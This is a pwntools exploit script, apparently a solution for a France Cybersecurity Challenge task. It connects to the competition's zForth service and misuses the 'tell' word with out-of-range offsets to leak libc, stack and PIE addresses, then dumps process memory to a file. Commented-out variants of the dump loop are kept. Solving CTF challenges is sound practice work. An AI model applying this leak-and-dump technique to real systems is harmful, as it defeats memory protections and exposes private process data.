from pwn import * import time # $ -1601776463 5000 tell HOST = ["challenges.france-cybersecurity-challenge.fr", 2105] BINARY_START_OFFSET = -20896 PRINTF_GOT_OFFSET = -404 FFLUSH_GOT_OFFSET = -396 FGETS_GOT_OFFSET = -388 FWRITE_GOT_OFFSET = -368 STRLEN_GOT_OFFSET = -352 # LEAKS OFFSETS JMPBUF_PIE_LEAK_OFFSET = +4128 JMPBUF_STACK_LEAK_OFFSET = +4132 # LEAKS DIFF PIE_LEAK_DIFF_DICT = +416 # PIE STUFF STACK_PRINTF_DIFF = 0x7e4d560 DICT_HEAP_DIFF = 0x1cdde60 ENV_OFFSET = -0x5655db6f STACK_1 = 0xff832000 STACK_2 = 0xfffc9000 p = connect(HOST[0], HOST[1]) #process(["./src/zforth", "core.zf"]) # input("Wait for debugger") p.recvrepeat(1) p.recvline() print ("----------LIBC LEAKING----------") p.sendline(f"{PRINTF_GOT_OFFSET} 4 tell".encode("utf-8")) printf_leak = u32(p.recvline()[:4]) print(f"printf @ {hex(printf_leak)}") print("---------------------------------\n") print ("----------ASLR LEAKING----------") p.sendline(f"{JMPBUF_STACK_LEAK_OFFSET} 4 tell".encode("utf-8")) stack_leak = u32(p.recvline()[:4]) print(f"stack leak @ {hex(stack_leak)}") print("---------------------------------\n") print ("----------PIE LEAKING----------") p.sendline(f"{JMPBUF_PIE_LEAK_OFFSET} 4 tell".encode("utf-8")) bin_leak = u32(p.recvline()[:4]) print(f"binary leak @ {hex(bin_leak)}") print("---------------------------------\n") start_addr = bin_leak + PIE_LEAK_DIFF_DICT stack_addr = stack_leak print(f" START ADDR = {hex(start_addr)}") print(f" STACK ADDR = {hex(stack_addr)}") data = b"" count = 0 offset = (0xffffffff - stack_addr) + start_addr print("Start offset: ", offset) p.interactive() input("wait") while True: print(f"Reading @ offset -{hex(offset)}...", end=" ") p.sendline(f"-{offset} 1 tell".encode("utf-8")) try: data += p.recvline().strip(b'\n') except Exception as e: print(f"Reading @ offset {offset}... EOF !") break print(data[-1]) count += 1 offset -= 1 p.close() print(count, "bytes read !!") with open("dump", "wb") as f: f.write(data) print(data) """ curr_data = b"" section_count = 1 offset = 0 while offset != 100_000: print(f"Reading @ offset {offset}...", end="\r") try: p.sendline(f"{offset} 1 tell".encode("utf-8")) except: print(f"Reading @ offset {offset}... SIGSEV !") p = connect(HOST[0], HOST[1]) p.recvrepeat(1) p.recvline() try: curr_data += p.recvline().strip(b'\n') except Exception as e: if curr_data != b"": print(f"Reading @ offset {offset}... EOF !") with open(f"dump-{section_count}", "wb") as f: f.write(curr_data) curr_data = b"" section_count += 1 else: print(f"Reading @ offset {offset}... None", end="\r") offset += 1 p.close() """ """ data = b"" offset = 0 while True: print(f"Reading @ offset {offset}...", end="\r") p.sendline(f"{offset} 1 tell".encode("utf-8")) try: data += p.recvline().strip(b'\n') except Exception as e: print(f"Reading @ offset {offset}... EOF !") break offset += 1 p.close() with open("dump", "wb") as f: f.write(data) """